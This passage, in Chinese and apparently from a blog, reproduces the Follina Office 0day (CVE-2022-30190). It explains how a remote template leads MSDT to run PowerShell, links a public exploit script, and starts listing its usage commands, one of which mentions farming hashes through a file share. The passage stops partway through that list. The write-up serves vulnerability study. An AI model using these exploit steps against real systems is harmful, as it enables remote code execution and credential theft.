前言
昨天大哥扔了个MS office 0day(CVE-2022-30190)的截图到群里,晚上就复现了一下 ,随即有了下文 。
攻击者可利用恶意Office文件中的远程模板功能从远程网络服务器获取恶意HTML文件,通过微软支持诊断工具(Microsoft Support Diagnostic Tool,MSDT)执行恶意PowerShell代码,这里的利用姿势跟CVE-2021-40444是一样的,但是后面的利用链不一样。因为之前手动复现过CVE-2021-40444,所以这里复现起来没什么难度。
复现
Github上已经有了现成脚本,手里也没有现成的样本,就用他这个了。
地址:https://github.com/chvancooten/follina.py
使用方法
代码语言:javascript复制# Execute a local binary
python .follina.py -m binary -b windowssystem32calc.exe
# Execute a binary from a file share (can be used to farm hashes
